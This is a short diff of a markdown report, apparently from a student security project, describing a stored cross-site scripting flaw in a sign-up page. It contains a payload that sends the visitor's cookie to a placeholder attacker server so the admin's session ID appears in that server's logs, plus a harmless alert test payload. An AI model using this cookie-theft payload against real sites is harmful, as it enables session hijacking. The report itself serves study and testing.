j0ly/FirstProject/REPORT.md

 ```<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>```

-When the admin logs in and takes a look at the sign-ups, his session-id should be written to the logs of “yourserver”.<br>
+When the admin logs in and takes a look at the sign-ups, his session-id should be written to the Apache logs of “yourserver”.<br>
 But you can also test with code like this, in any of the fields on the SignUp page;
 ```<body onload=alert('hello')>```